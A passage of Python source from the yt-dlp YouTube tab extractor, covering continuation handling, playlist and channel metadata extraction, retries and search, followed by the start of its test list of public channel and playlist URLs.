contents = post_thread_continuation.get('contents')
if not isinstance(contents, list):
return
for content in contents:
renderer = content.get('backstagePostThreadRenderer')
if not isinstance(renderer, dict):
continue
for entry in self._post_thread_entries(renderer):
yield entry
r''' # unused
def _rich_grid_entries(self, contents):
for content in contents:
video_renderer = try_get(content, lambda x: x['richItemRenderer']['content']['videoRenderer'], dict)
if video_renderer:
entry = self._video_entry(video_renderer)
if entry:
yield entry
'''
def _extract_entries(self, parent_renderer, continuation_list):
# continuation_list is modified in-place with continuation_list = [continuation_token]
continuation_list[:] = [None]
contents = try_get(parent_renderer, lambda x: x['contents'], list) or []
for content in contents:
if not isinstance(content, dict):
continue
is_renderer = traverse_obj(
content, 'itemSectionRenderer', 'musicShelfRenderer', 'musicShelfContinuation',
expected_type=dict)
if not is_renderer:
renderer = content.get('richItemRenderer')
if renderer:
for entry in self._rich_entries(renderer):
yield entry
continuation_list[0] = self._extract_continuation(parent_renderer)
continue
isr_contents = try_get(is_renderer, lambda x: x['contents'], list) or []
for isr_content in isr_contents:
if not isinstance(isr_content, dict):
continue
known_renderers = {
'playlistVideoListRenderer': self._playlist_entries,
'gridRenderer': self._grid_entries,
'reelShelfRenderer': self._grid_entries,
'shelfRenderer': self._shelf_entries,
'musicResponsiveListItemRenderer': lambda x: [self._music_reponsive_list_entry(x)],
'backstagePostThreadRenderer': self._post_thread_entries,
'videoRenderer': lambda x: [self._video_entry(x)],
'playlistRenderer': lambda x: self._grid_entries({'items': [{'playlistRenderer': x}]}),
'channelRenderer': lambda x: self._grid_entries({'items': [{'channelRenderer': x}]}),
'hashtagTileRenderer': lambda x: [self._hashtag_tile_entry(x)]
}
for key, renderer in isr_content.items():
if key not in known_renderers:
continue
for entry in known_renderers[key](renderer):
if entry:
yield entry
continuation_list[0] = self._extract_continuation(renderer)
break
if not continuation_list[0]:
continuation_list[0] = self._extract_continuation(is_renderer)
if not continuation_list[0]:
continuation_list[0] = self._extract_continuation(parent_renderer)
def _entries(self, tab, item_id, ytcfg, account_syncid, visitor_data):
continuation_list = [None]
extract_entries = lambda x: self._extract_entries(x, continuation_list)
tab_content = try_get(tab, lambda x: x['content'], dict)
if not tab_content:
return
parent_renderer = (
try_get(tab_content, lambda x: x['sectionListRenderer'], dict)
or try_get(tab_content, lambda x: x['richGridRenderer'], dict) or {})
for entry in extract_entries(parent_renderer):
yield entry
continuation = continuation_list[0]
for page_num in itertools.count(1):
if not continuation:
break
headers = self.generate_api_headers(
ytcfg=ytcfg, account_syncid=account_syncid, visitor_data=visitor_data)
response = self._extract_response(
item_id='%s page %s' % (item_id, page_num),
query=continuation, headers=headers, ytcfg=ytcfg,
check_get_keys=('continuationContents', 'onResponseReceivedActions', 'onResponseReceivedEndpoints'))
if not response:
break
# Extracting updated visitor data is required to prevent an infinite extraction loop in some cases
# See: https://github.com/ytdl-org/youtube-dl/issues/28702
visitor_data = self._extract_visitor_data(response) or visitor_data
known_continuation_renderers = {
'playlistVideoListContinuation': self._playlist_entries,
'gridContinuation': self._grid_entries,
'itemSectionContinuation': self._post_thread_continuation_entries,
'sectionListContinuation': extract_entries, # for feeds
}
continuation_contents = try_get(
response, lambda x: x['continuationContents'], dict) or {}
continuation_renderer = None
for key, value in continuation_contents.items():
if key not in known_continuation_renderers:
continue
continuation_renderer = value
continuation_list = [None]
for entry in known_continuation_renderers[key](continuation_renderer):
yield entry
continuation = continuation_list[0] or self._extract_continuation(continuation_renderer)
break
if continuation_renderer:
continue
known_renderers = {
'videoRenderer': (self._grid_entries, 'items'), # for membership tab
'gridPlaylistRenderer': (self._grid_entries, 'items'),
'gridVideoRenderer': (self._grid_entries, 'items'),
'gridChannelRenderer': (self._grid_entries, 'items'),
'playlistVideoRenderer': (self._playlist_entries, 'contents'),
'itemSectionRenderer': (extract_entries, 'contents'), # for feeds
'richItemRenderer': (extract_entries, 'contents'), # for hashtag
'backstagePostThreadRenderer': (self._post_thread_continuation_entries, 'contents')
}
on_response_received = dict_get(response, ('onResponseReceivedActions', 'onResponseReceivedEndpoints'))
continuation_items = try_get(
on_response_received, lambda x: x[0]['appendContinuationItemsAction']['continuationItems'], list)
continuation_item = try_get(continuation_items, lambda x: x[0], dict) or {}
video_items_renderer = None
for key, value in continuation_item.items():
if key not in known_renderers:
continue
video_items_renderer = {known_renderers[key][1]: continuation_items}
continuation_list = [None]
for entry in known_renderers[key][0](video_items_renderer):
yield entry
continuation = continuation_list[0] or self._extract_continuation(video_items_renderer)
break
if video_items_renderer:
continue
break
@staticmethod
def _extract_selected_tab(tabs, fatal=True):
for tab in tabs:
renderer = dict_get(tab, ('tabRenderer', 'expandableTabRenderer')) or {}
if renderer.get('selected') is True:
return renderer
else:
if fatal:
raise ExtractorError('Unable to find selected tab')
def _extract_uploader(self, data):
uploader = {}
renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarSecondaryInfoRenderer') or {}
owner = try_get(
renderer, lambda x: x['videoOwner']['videoOwnerRenderer']['title']['runs'][0], dict)
if owner:
owner_text = owner.get('text')
uploader['uploader'] = self._search_regex(
r'^by (.+) and \d+ others?$', owner_text, 'uploader', default=owner_text)
uploader['uploader_id'] = try_get(
owner, lambda x: x['navigationEndpoint']['browseEndpoint']['browseId'], compat_str)
uploader['uploader_url'] = urljoin(
'https://www.youtube.com/',
try_get(owner, lambda x: x['navigationEndpoint']['browseEndpoint']['canonicalBaseUrl'], compat_str))
return {k: v for k, v in uploader.items() if v is not None}
def _extract_from_tabs(self, item_id, ytcfg, data, tabs):
playlist_id = title = description = channel_url = channel_name = channel_id = None
tags = []
selected_tab = self._extract_selected_tab(tabs)
primary_sidebar_renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarPrimaryInfoRenderer')
renderer = try_get(
data, lambda x: x['metadata']['channelMetadataRenderer'], dict)
if renderer:
channel_name = renderer.get('title')
channel_url = renderer.get('channelUrl')
channel_id = renderer.get('externalId')
else:
renderer = try_get(
data, lambda x: x['metadata']['playlistMetadataRenderer'], dict)
if renderer:
title = renderer.get('title')
description = renderer.get('description', '')
playlist_id = channel_id
tags = renderer.get('keywords', '').split()
# We can get the uncropped banner/avatar by replacing the crop params with '=s0'
# See: https://github.com/yt-dlp/yt-dlp/issues/2237#issuecomment-1013694714
def _get_uncropped(url):
return url_or_none((url or '').split('=')[0] + '=s0')
avatar_thumbnails = self._extract_thumbnails(renderer, 'avatar')
if avatar_thumbnails:
uncropped_avatar = _get_uncropped(avatar_thumbnails[0]['url'])
if uncropped_avatar:
avatar_thumbnails.append({
'url': uncropped_avatar,
'id': 'avatar_uncropped',
'preference': 1
})
channel_banners = self._extract_thumbnails(
data, ('header', ..., ['banner', 'mobileBanner', 'tvBanner']))
for banner in channel_banners:
banner['preference'] = -10
if channel_banners:
uncropped_banner = _get_uncropped(channel_banners[0]['url'])
if uncropped_banner:
channel_banners.append({
'url': uncropped_banner,
'id': 'banner_uncropped',
'preference': -5
})
primary_thumbnails = self._extract_thumbnails(
primary_sidebar_renderer, ('thumbnailRenderer', ('playlistVideoThumbnailRenderer', 'playlistCustomThumbnailRenderer'), 'thumbnail'))
if playlist_id is None:
playlist_id = item_id
playlist_stats = traverse_obj(primary_sidebar_renderer, 'stats')
last_updated_unix, _ = self._extract_time_text(playlist_stats, 2)
if title is None:
title = self._get_text(data, ('header', 'hashtagHeaderRenderer', 'hashtag')) or playlist_id
title += format_field(selected_tab, 'title', ' - %s')
title += format_field(selected_tab, 'expandedText', ' - %s')
metadata = {
'playlist_id': playlist_id,
'playlist_title': title,
'playlist_description': description,
'uploader': channel_name,
'uploader_id': channel_id,
'uploader_url': channel_url,
'thumbnails': primary_thumbnails + avatar_thumbnails + channel_banners,
'tags': tags,
'view_count': self._get_count(playlist_stats, 1),
'availability': self._extract_availability(data),
'modified_date': strftime_or_none(last_updated_unix, '%Y%m%d'),
'playlist_count': self._get_count(playlist_stats, 0),
'channel_follower_count': self._get_count(data, ('header', ..., 'subscriberCountText')),
}
if not channel_id:
metadata.update(self._extract_uploader(data))
metadata.update({
'channel': metadata['uploader'],
'channel_id': metadata['uploader_id'],
'channel_url': metadata['uploader_url']})
return self.playlist_result(
self._entries(
selected_tab, playlist_id, ytcfg,
self._extract_account_syncid(ytcfg, data),
self._extract_visitor_data(data, ytcfg)),
**metadata)
def _extract_mix_playlist(self, playlist, playlist_id, data, ytcfg):
first_id = last_id = response = None
for page_num in itertools.count(1):
videos = list(self._playlist_entries(playlist))
if not videos:
return
start = next((i for i, v in enumerate(videos) if v['id'] == last_id), -1) + 1
if start >= len(videos):
return
for video in videos[start:]:
if video['id'] == first_id:
self.to_screen('First video %s found again; Assuming end of Mix' % first_id)
return
yield video
first_id = first_id or videos[0]['id']
last_id = videos[-1]['id']
watch_endpoint = try_get(
playlist, lambda x: x['contents'][-1]['playlistPanelVideoRenderer']['navigationEndpoint']['watchEndpoint'])
headers = self.generate_api_headers(
ytcfg=ytcfg, account_syncid=self._extract_account_syncid(ytcfg, data),
visitor_data=self._extract_visitor_data(response, data, ytcfg))
query = {
'playlistId': playlist_id,
'videoId': watch_endpoint.get('videoId') or last_id,
'index': watch_endpoint.get('index') or len(videos),
'params': watch_endpoint.get('params') or 'OAE%3D'
}
response = self._extract_response(
item_id='%s page %d' % (playlist_id, page_num),
query=query, ep='next', headers=headers, ytcfg=ytcfg,
check_get_keys='contents'
)
playlist = try_get(
response, lambda x: x['contents']['twoColumnWatchNextResults']['playlist']['playlist'], dict)
def _extract_from_playlist(self, item_id, url, data, playlist, ytcfg):
title = playlist.get('title') or try_get(
data, lambda x: x['titleText']['simpleText'], compat_str)
playlist_id = playlist.get('playlistId') or item_id
# Delegating everything except mix playlists to regular tab-based playlist URL
playlist_url = urljoin(url, try_get(
playlist, lambda x: x['endpoint']['commandMetadata']['webCommandMetadata']['url'],
compat_str))
if playlist_url and playlist_url != url:
return self.url_result(
playlist_url, ie=YoutubeTabIE.ie_key(), video_id=playlist_id,
video_title=title)
return self.playlist_result(
self._extract_mix_playlist(playlist, playlist_id, data, ytcfg),
playlist_id=playlist_id, playlist_title=title)
def _extract_availability(self, data):
"""
Gets the availability of a given playlist/tab.
Note: Unless YouTube tells us explicitly, we do not assume it is public
@param data: response
"""
is_private = is_unlisted = None
renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarPrimaryInfoRenderer') or {}
badge_labels = self._extract_badges(renderer)
# Personal playlists, when authenticated, have a dropdown visibility selector instead of a badge
privacy_dropdown_entries = try_get(
renderer, lambda x: x['privacyForm']['dropdownFormFieldRenderer']['dropdown']['dropdownRenderer']['entries'], list) or []
for renderer_dict in privacy_dropdown_entries:
is_selected = try_get(
renderer_dict, lambda x: x['privacyDropdownItemRenderer']['isSelected'], bool) or False
if not is_selected:
continue
label = self._get_text(renderer_dict, ('privacyDropdownItemRenderer', 'label'))
if label:
badge_labels.add(label.lower())
break
for badge_label in badge_labels:
if badge_label == 'unlisted':
is_unlisted = True
elif badge_label == 'private':
is_private = True
elif badge_label == 'public':
is_unlisted = is_private = False
return self._availability(is_private, False, False, False, is_unlisted)
@staticmethod
def _extract_sidebar_info_renderer(data, info_renderer, expected_type=dict):
sidebar_renderer = try_get(
data, lambda x: x['sidebar']['playlistSidebarRenderer']['items'], list) or []
for item in sidebar_renderer:
renderer = try_get(item, lambda x: x[info_renderer], expected_type)
if renderer:
return renderer
def _reload_with_unavailable_videos(self, item_id, data, ytcfg):
"""
Get playlist with unavailable videos if the 'show unavailable videos' button exists.
"""
browse_id = params = None
renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarPrimaryInfoRenderer')
if not renderer:
return
menu_renderer = try_get(
renderer, lambda x: x['menu']['menuRenderer']['items'], list) or []
for menu_item in menu_renderer:
if not isinstance(menu_item, dict):
continue
nav_item_renderer = menu_item.get('menuNavigationItemRenderer')
text = try_get(
nav_item_renderer, lambda x: x['text']['simpleText'], compat_str)
if not text or text.lower() != 'show unavailable videos':
continue
browse_endpoint = try_get(
nav_item_renderer, lambda x: x['navigationEndpoint']['browseEndpoint'], dict) or {}
browse_id = browse_endpoint.get('browseId')
params = browse_endpoint.get('params')
break
headers = self.generate_api_headers(
ytcfg=ytcfg, account_syncid=self._extract_account_syncid(ytcfg, data),
visitor_data=self._extract_visitor_data(data, ytcfg))
query = {
'params': params or 'wgYCCAA=',
'browseId': browse_id or 'VL%s' % item_id
}
return self._extract_response(
item_id=item_id, headers=headers, query=query,
check_get_keys='contents', fatal=False, ytcfg=ytcfg,
note='Downloading API JSON with unavailable videos')
def _extract_webpage(self, url, item_id, fatal=True):
retries = self.get_param('extractor_retries', 3)
count = -1
webpage = data = last_error = None
while count < retries:
count += 1
# Sometimes youtube returns a webpage with incomplete ytInitialData
# See: https://github.com/yt-dlp/yt-dlp/issues/116
if last_error:
self.report_warning('%s. Retrying ...' % last_error)
try:
webpage = self._download_webpage(
url, item_id,
note='Downloading webpage%s' % (' (retry #%d)' % count if count else '',))
data = self.extract_yt_initial_data(item_id, webpage or '', fatal=fatal) or {}
except ExtractorError as e:
if isinstance(e.cause, network_exceptions):
if not isinstance(e.cause, compat_HTTPError) or e.cause.code not in (403, 429):
last_error = error_to_compat_str(e.cause or e.msg)
if count < retries:
continue
if fatal:
raise
self.report_warning(error_to_compat_str(e))
break
else:
try:
self._extract_and_report_alerts(data)
except ExtractorError as e:
if fatal:
raise
self.report_warning(error_to_compat_str(e))
break
if dict_get(data, ('contents', 'currentVideoEndpoint', 'onResponseReceivedActions')):
break
last_error = 'Incomplete yt initial data received'
if count >= retries:
if fatal:
raise ExtractorError(last_error)
self.report_warning(last_error)
break
return webpage, data
def _extract_data(self, url, item_id, ytcfg=None, fatal=True, webpage_fatal=False, default_client='web'):
data = None
if 'webpage' not in self._configuration_arg('skip'):
webpage, data = self._extract_webpage(url, item_id, fatal=webpage_fatal)
ytcfg = ytcfg or self.extract_ytcfg(item_id, webpage)
# Reject webpage data if redirected to home page without explicitly requesting
selected_tab = self._extract_selected_tab(traverse_obj(
data, ('contents', 'twoColumnBrowseResultsRenderer', 'tabs'), expected_type=list, default=[]), fatal=False) or {}
if (url != 'https://www.youtube.com/feed/recommended'
and selected_tab.get('tabIdentifier') == 'FEwhat_to_watch' # Home page
and 'no-youtube-channel-redirect' not in self.get_param('compat_opts', [])):
msg = 'The channel/playlist does not exist and the URL redirected to youtube.com home page'
if fatal:
raise ExtractorError(msg, expected=True)
self.report_warning(msg, only_once=True)
if not data:
if not ytcfg and self.is_authenticated:
msg = 'Playlists that require authentication may not extract correctly without a successful webpage download.'
if 'authcheck' not in self._configuration_arg('skip') and fatal:
raise ExtractorError(
msg + ' If you are not downloading private content, or your cookies are only for the first account and channel,'
' pass "--extractor-args youtubetab:skip=authcheck" to skip this check',
expected=True)
self.report_warning(msg, only_once=True)
data = self._extract_tab_endpoint(url, item_id, ytcfg, fatal=fatal, default_client=default_client)
return data, ytcfg
def _extract_tab_endpoint(self, url, item_id, ytcfg=None, fatal=True, default_client='web'):
headers = self.generate_api_headers(ytcfg=ytcfg, default_client=default_client)
resolve_response = self._extract_response(
item_id=item_id, query={'url': url}, check_get_keys='endpoint', headers=headers, ytcfg=ytcfg, fatal=fatal,
ep='navigation/resolve_url', note='Downloading API parameters API JSON', default_client=default_client)
endpoints = {'browseEndpoint': 'browse', 'watchEndpoint': 'next'}
for ep_key, ep in endpoints.items():
params = try_get(resolve_response, lambda x: x['endpoint'][ep_key], dict)
if params:
return self._extract_response(
item_id=item_id, query=params, ep=ep, headers=headers,
ytcfg=ytcfg, fatal=fatal, default_client=default_client,
check_get_keys=('contents', 'currentVideoEndpoint', 'onResponseReceivedActions'))
err_note = 'Failed to resolve url (does the playlist exist?)'
if fatal:
raise ExtractorError(err_note, expected=True)
self.report_warning(err_note, item_id)
_SEARCH_PARAMS = None
def _search_results(self, query, params=NO_DEFAULT, default_client='web'):
data = {'query': query}
if params is NO_DEFAULT:
params = self._SEARCH_PARAMS
if params:
data['params'] = params
content_keys = (
('contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'sectionListRenderer', 'contents'),
('onResponseReceivedCommands', 0, 'appendContinuationItemsAction', 'continuationItems'),
# ytmusic search
('contents', 'tabbedSearchResultsRenderer', 'tabs', 0, 'tabRenderer', 'content', 'sectionListRenderer', 'contents'),
('continuationContents', ),
)
check_get_keys = tuple(set(keys[0] for keys in content_keys))
continuation_list = [None]
for page_num in itertools.count(1):
data.update(continuation_list[0] or {})
search = self._extract_response(
item_id='query "%s" page %s' % (query, page_num), ep='search', query=data,
default_client=default_client, check_get_keys=check_get_keys)
slr_contents = traverse_obj(search, *content_keys)
yield from self._extract_entries({'contents': list(variadic(slr_contents))}, continuation_list)
if not continuation_list[0]:
break
class YoutubeTabIE(YoutubeTabBaseInfoExtractor):
IE_DESC = 'YouTube Tabs'
_VALID_URL = r'''(?x:
https?://
(?:\w+\.)?
(?:
youtube(?:kids)?\.com|
%(invidious)s
)/
(?:
(?P<channel_type>channel|c|user|browse)/|
(?P<not_channel>
feed/|hashtag/|
(?:playlist|watch)\?.*?\blist=
)|
(?!(?:%(reserved_names)s)\b) # Direct URLs
)
(?P<id>[^/?\#&]+)
)''' % {
'reserved_names': YoutubeBaseInfoExtractor._RESERVED_NAMES,
'invidious': '|'.join(YoutubeBaseInfoExtractor._INVIDIOUS_SITES),
}
IE_NAME = 'youtube:tab'
_TESTS = [{
'note': 'playlists, multipage',
'url': 'https://www.youtube.com/c/ИгорьКлейнер/playlists?view=1&flow=grid',
'playlist_mincount': 94,
'info_dict': {
'id': 'UCqj7Cz7revf5maW9g5pgNcg',
'title': 'Igor Kleiner - Playlists',
'description': 'md5:be97ee0f14ee314f1f002cf187166ee2',
'uploader': 'Igor Kleiner',
'uploader_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'channel': 'Igor Kleiner',
'channel_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'tags': ['"критическое', 'мышление"', '"наука', 'просто"', 'математика', '"анализ', 'данных"'],
'channel_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'uploader_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'channel_follower_count': int
},
}, {
'note': 'playlists, multipage, different order',
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 94,
'info_dict': {
'id': 'UCqj7Cz7revf5maW9g5pgNcg',
'title': 'Igor Kleiner - Playlists',
'description': 'md5:be97ee0f14ee314f1f002cf187166ee2',
'uploader_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'uploader': 'Igor Kleiner',
'uploader_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'tags': ['"критическое', 'мышление"', '"наука', 'просто"', 'математика', '"анализ', 'данных"'],
'channel_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'channel': 'Igor Kleiner',
'channel_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'channel_follower_count': int
},
}, {
'note': 'playlists, series',
'url': 'https://www.youtube.com/c/3blue1brown/playlists?view=50&sort=dd&shelf_id=3',
'playlist_mincount': 5,
'info_dict': {
'id': 'UCYO_jab_esuFRV4b17AJtAw',
'title': '3Blue1Brown - Playlists',
'description': 'md5:e1384e8a133307dd10edee76e875d62f',
'uploader_id': 'UCYO_jab_esuFRV4b17AJtAw',
'uploader': '3Blue1Brown',
'channel_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'uploader_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'channel': '3Blue1Brown',
'channel_id': 'UCYO_jab_esuFRV4b17AJtAw',
'tags': ['Mathematics'],
'channel_follower_count': int
},
}, {
'note': 'playlists, singlepage',
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'UCAEtajcuhQ6an9WEzY9LEMQ',
'title': 'ThirstForScience - Playlists',
'description': 'md5:609399d937ea957b0f53cbffb747a14c',
'uploader': 'ThirstForScience',
'uploader_id': 'UCAEtajcuhQ6an9WEzY9LEMQ',
'uploader_url': 'https://www.youtube.com/channel/UCAEtajcuhQ6an9WEzY9LEMQ',
'channel_url': 'https://www.youtube.com/channel/UCAEtajcuhQ6an9WEzY9LEMQ',
'channel_id': 'UCAEtajcuhQ6an9WEzY9LEMQ',
'tags': 'count:13',
'channel': 'ThirstForScience',
'channel_follower_count': int
}
}, {
'url': 'https://www.youtube.com/c/ChristophLaimer/playlists',
'only_matching': True,
}, {
'note': 'basic, single video playlist',
'url': 'https://www.youtube.com/playlist?list=PL4lCao7KL_QFVb7Iudeipvc2BCavECqzc',
'info_dict': {
'uploader_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'uploader': 'Sergey M.',
'id': 'PL4lCao7KL_QFVb7Iudeipvc2BCavECqzc',
'title': 'youtube-dl public playlist',
'description': '',
'tags': [],
'view_count': int,
'modified_date': '20201130',
'channel': 'Sergey M.',
'channel_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'uploader_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'channel_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
},
'playlist_count': 1,
}, {
'note': 'empty playlist',
'url': 'https://www.youtube.com/playlist?list=PL4lCao7KL_QFodcLWhDpGCYnngnHtQ-Xf',
'info_dict': {
'uploader_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'uploader': 'Sergey M.',
'id': 'PL4lCao7KL_QFodcLWhDpGCYnngnHtQ-Xf',
'title': 'youtube-dl empty playlist',
'tags': [],
'channel': 'Sergey M.',
'description': '',
'modified_date': '20160902',
'channel_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'channel_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'uploader_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
},
'playlist_count': 0,
}, {
'note': 'Home tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/featured',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Home',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'tags': ['bible', 'history', 'prophesy'],
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_follower_count': int
},
'playlist_mincount': 2,
}, {
'note': 'Videos tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/videos',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Videos',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_follower_count': int
},
'playlist_mincount': 975,
}, {
'note': 'Videos tab, sorted by popular',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/videos?view=0&sort=p&flow=grid',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Videos',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'tags': ['bible', 'history', 'prophesy'],
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_follower_count': int
},
'playlist_mincount': 199,
}, {
'note': 'Playlists tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/playlists',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Playlists',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_follower_count': int
},
'playlist_mincount': 17,
}, {
'note': 'Community tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/community',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Community',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_follower_count': int
},
'playlist_mincount': 18,
}, {
'note': 'Channels tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/channels',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Channels',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_follower_count': int
},
'playlist_mincount': 12,
}, {
'note': 'Search tab',
'url': 'https://www.youtube.com/c/3blue1brown/search?query=linear%20algebra',
'playlist_mincount': 40,
'info_dict': {
'id': 'UCYO_jab_esuFRV4b17AJtAw',
'title': '3Blue1Brown - Search - linear algebra',
'description': 'md5:e1384e8a133307dd10edee76e875d62f',
'uploader': '3Blue1Brown',
'uploader_id': 'UCYO_jab_esuFRV4b17AJtAw',
'channel_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'uploader_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'tags': ['Mathematics'],
'channel': '3Blue1Brown',
'channel_id': 'UCYO_jab_esuFRV4b17AJtAw',
'channel_follower_count': int
},
}, {
'url': 'https://invidio.us/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'only_matching': True,
}, {
'url': 'https://www.youtubekids.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'only_matching': True,
}, {
'url': 'https://music.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'only_matching': True,
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'uploader': 'Christiaan008',
'uploader_id': 'UCEPzS1rYsrkqzSLNp76nrcg',
'description': 'md5:a14dc1a8ef8307a9807fe136a0660268',
'tags': [],
'uploader_url': 'https://www.youtube.com/c/ChRiStIaAn008',
'view_count': int,
'modified_date': '20150605',
'channel_id': 'UCEPzS1rYsrkqzSLNp76nrcg',
'channel_url': 'https://www.youtube.com/c/ChRiStIaAn008',
'channel': 'Christiaan008',
},
'playlist_count': 96,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
'uploader': 'Cauchemar',
'uploader_id': 'UCBABnxM4Ar9ten8Mdjj1j0Q',
'channel_url': 'https://www.youtube.com/c/Cauchemar89',
'tags': [],
'modified_date': r're:\d{8}',
'channel': 'Cauchemar',
'uploader_url': 'https://www.youtube.com/c/Cauchemar89',
'view_count': int,
'description': '',
'channel_id': 'UCBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 1123,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'even larger playlist, 8832 videos',
'url': 'http://www.youtube.com/user/NASAgovVideo/videos',
'only_matching': True,
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
'uploader': 'Interstellar Movie',
'uploader_id': 'UCXw-G3eDE9trcvY2sBMM_aA',
'uploader_url': 'https://www.youtube.com/c/InterstellarMovie',
